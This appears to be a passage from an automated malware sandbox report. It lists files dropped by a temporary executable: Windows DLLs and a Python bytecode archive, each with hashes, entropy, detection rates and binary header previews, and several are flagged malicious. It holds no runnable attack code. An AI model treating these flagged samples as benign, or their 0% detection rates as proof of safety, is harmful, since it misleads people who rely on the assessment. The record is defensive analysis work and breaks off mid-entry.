                                                                                                                                                                SSDEEP:384:h81nWm5CcWEhWke9HQpBj0HRN7KQhv2kQHRN7yAXOVlTnG:hOnWm5C6DMHqWKmuk8pb
                                                                                                                                                                MD5:633DCA52DA4EBAA6F4BF268822C6DC88
                                                                                                                                                                SHA1:1EBFC0F881CE338D2F66FCC3F9C1CBB94CDC067E
                                                                                                                                                                SHA-256:424FD5D3D3297A8AB1227007EF8DED5A4F194F24BD573A5211BE71937AA55D22
                                                                                                                                                                SHA-512:ED058525EE7B4CC7E12561C7D674C26759A4301322FF0B3239F3183911CE14993614E3199D8017B9BFDE25C8CB9AC0990D318BB19F3992624B39EC0F084A8DF1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......."....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20760
                                                                                                                                                                Entropy (8bit):7.011889321604509
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:eQWEhWxFQpBj0HRN7o8/QHRN7/cPcSIlexP:eWGqWo8/8/l6B
                                                                                                                                                                MD5:43BF2037BFD3FB60E1FEDAC634C6F86E
                                                                                                                                                                SHA1:959EEBE41D905AD3AFA4254A52628EC13613CF70
                                                                                                                                                                SHA-256:735703C0597DA278AF8A6359FC051B9E657627F50AD5B486185C2EF328AD571B
                                                                                                                                                                SHA-512:7042846C009EFEA45CA5FAFDC08016ECA471A8C54486BA03F212ABBA47467F8744E9546C8F33214620F97DBCC994E3002788AD0DB65B86D8A3E4FF0D8A9D0D05
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20248
                                                                                                                                                                Entropy (8bit):7.08402114712403
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:29DWEhWXFQpBj0HRN7lbQHRN7s8SIlexeXC:kkqWN8L6cXC
                                                                                                                                                                MD5:D51BC845C4EFBFDBD68E8CCFFDAD7375
                                                                                                                                                                SHA1:C82E580EC68C48E613C63A4C2F9974BB59182CF6
                                                                                                                                                                SHA-256:89D9F54E6C9AE1CB8F914DA1A2993A20DE588C18F1AAF4D66EFB20C3A282C866
                                                                                                                                                                SHA-512:2E353CF58AD218C3E068A345D1DA6743F488789EF7C6B96492D48571DC64DF8A71AD2DB2E5976CFD04CF4B55455E99C70C7F32BD2C0F4A8BED1D29C2DAFC17B0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......].....`.........................................`...e............ ...................A..............8............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28952
                                                                                                                                                                Entropy (8bit):6.688687241998293
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:wZVacWM4Oe59Ckb1hgmLiWEhW1e9HQpBj0HRN7O2KQHRN7w3kclsHMkZT:wZVJWMq59Bb1jQuMHqWOz8Akx
                                                                                                                                                                MD5:487F72D0CF7DC1D85FA18788A1B46813
                                                                                                                                                                SHA1:0AABFF6D4EE9A2A56D40EE61E4591D4BA7D14C0D
                                                                                                                                                                SHA-256:560BAF1B87B692C284CCBB82F2458A688757231B315B6875482E08C8F5333B3D
                                                                                                                                                                SHA-512:B7F4E32F98BFDCF799331253FAEBB1FB08EC24F638D8526F02A6D9371C8490B27D03DB3412128CED6D2BBB11604247F3F22C8380B1BF2A11FB3BB92F18980185
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........,...............................................P.......%....`.........................................`....%...........@...............0...A..............8............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20760
                                                                                                                                                                Entropy (8bit):7.028263219925353
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:JitIlWEhWO5oQpBj0HRN7BXVQHRN7DEp1x09lgezq:w6paqWz8Apsm
                                                                                                                                                                MD5:54A8FCA040976F2AAC779A344B275C80
                                                                                                                                                                SHA1:EA1F01D6DCDF688EB0F21A8CB8A38F03BC777883
                                                                                                                                                                SHA-256:7E90E7ACC69ACA4591CE421C302C7F6CDF8E44F3B4390F66EC43DFF456FFEA29
                                                                                                                                                                SHA-512:CB20BED4972E56F74DE1B7BC50DC1E27F2422DBB302AECB749018B9F88E3E4A67C9FC69BBBB8C4B21D49A530CC8266172E7D237650512AAFB293CDFE06D02228
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...x............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):24344
                                                                                                                                                                Entropy (8bit):6.897926491070706
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:B42r77WEhWCFQpBj0HRN7SQHRN7oSIlexw40:B42r7DrqWS8o6x0
                                                                                                                                                                MD5:21B509D048418922B92985696710AFCA
                                                                                                                                                                SHA1:C499DD098AAB8C7E05B8B0FD55F994472D527203
                                                                                                                                                                SHA-256:FE7336D2FB3B13A00B5B4CE055A84F0957DAEFDACE94F21B88E692E54B678AC3
                                                                                                                                                                SHA-512:C517B02D4E94CF8360D98FD093BCA25E8AE303C1B4500CF4CF01F78A7D7EF5F581B99A0371F438C6805A0B3040A0E06994BA7B541213819BD07EC8C6251CB9BB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@......~.....`.........................................`...4............0...................A..............8............................................................................rdata..H...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):25880
                                                                                                                                                                Entropy (8bit):6.843889819511554
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:z3vAmiFVhFWEhWGqQpBj0HRN79XJQHRN7/SCMllJXq:zvYjoqW958/ga
                                                                                                                                                                MD5:120A5DC2682CD2A838E0FC0EFD45506E
                                                                                                                                                                SHA1:8710BE5D5E9C878669FF8B25B67FB2DEB32CD77A
                                                                                                                                                                SHA-256:C14F0D929A761A4505628C4EB5754D81B88AA1FDAD2154A2F2B0215B983B6D89
                                                                                                                                                                SHA-512:4330EDF9B84C541E5ED3BB672548F35EFA75C6B257C3215FC29BA6E152294820347517EC9BD6BDE38411EFA9074324A276CF0D7D905ED5DD88E906D78780760C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`...a............0...............$...A..............8............................................................................rdata..t...........................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):25880
                                                                                                                                                                Entropy (8bit):6.8416401850774395
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:p5yguNvZ5VQgx3SbwA71IkFZpMHqW74W8Lipsy:p5yguNvZ5VQgx3SbwA71IipMR747fy
                                                                                                                                                                MD5:F22FACA49E4D5D80EC26ED31E7ECD0E0
                                                                                                                                                                SHA1:473BCBFB78E6A63AFD720B5CBE5C55D9495A3D88
                                                                                                                                                                SHA-256:1EB30EA95DAE91054A33A12B1C73601518D28E3746DB552D7CE120DA589D4CF4
                                                                                                                                                                SHA-512:C8090758435F02E3659D303211D78102C71754BA12B0A7E25083FD3529B3894DC3AB200B02A2899418CC6ED3B8F483D36E6C2BF86CE2A34E5FD9AD0483B73040
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`................0...............$...A..............8............................................................................rdata..............................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):22296
                                                                                                                                                                Entropy (8bit):6.97368865913958
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:SPEzaWEhW/slQpBj0HRN7sVQHRN7gkclsHTyt:Y0YRqWg8jyt
                                                                                                                                                                MD5:2FD0DA47811B8ED4A0ABDF9030419381
                                                                                                                                                                SHA1:46E3F21A9BD31013A804BA45DC90CC22331A60D1
                                                                                                                                                                SHA-256:DE81C4D37833380A1C71A5401DE3AB4FE1F8856FC40D46D0165719A81D7F3924
                                                                                                                                                                SHA-512:2E6F900628809BFD908590FE1EA38E0E36960235F9A6BBCCB73BBB95C71BFD10F75E1DF5E8CF93A682E4ADA962B06C278AFC9123AB5A4117F77D1686FF683D6F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20248
                                                                                                                                                                Entropy (8bit):7.0800725103781765
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:JBf5WEhWye9HQpBj0HRN7tKQHRN7jsAXOVlTBr:zf5dMHqWtK87U
                                                                                                                                                                MD5:FE1096F1ADE3342F049921928327F553
                                                                                                                                                                SHA1:118FB451AB006CC55F715CDF3B5E0C49CF42FBE0
                                                                                                                                                                SHA-256:88D3918E2F063553CEE283306365AA8701E60FB418F37763B4719F9974F07477
                                                                                                                                                                SHA-512:0A982046F0C93F68C03A9DD48F2BC7AEE68B9EEBEAEA01C3566B2384D0B8A231570E232168D4608A09136BCB2B1489AF802FD0C25348F743F0C1C8955EDD41C1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......0....`.........................................`...^............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):841697
                                                                                                                                                                Entropy (8bit):5.484581034394053
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3381792
                                                                                                                                                                Entropy (8bit):6.094908167946797
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):32792
                                                                                                                                                                Entropy (8bit):6.372276555451265
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4183112
                                                                                                                                                                Entropy (8bit):6.420172758698049
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26696
                                                                                                                                                                Entropy (8bit):6.101296746249305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1046080
                                                                                                                                                                Entropy (8bit):6.649151787942547
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1096264
                                                                                                                                                                Entropy (8bit):5.343512979675051
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
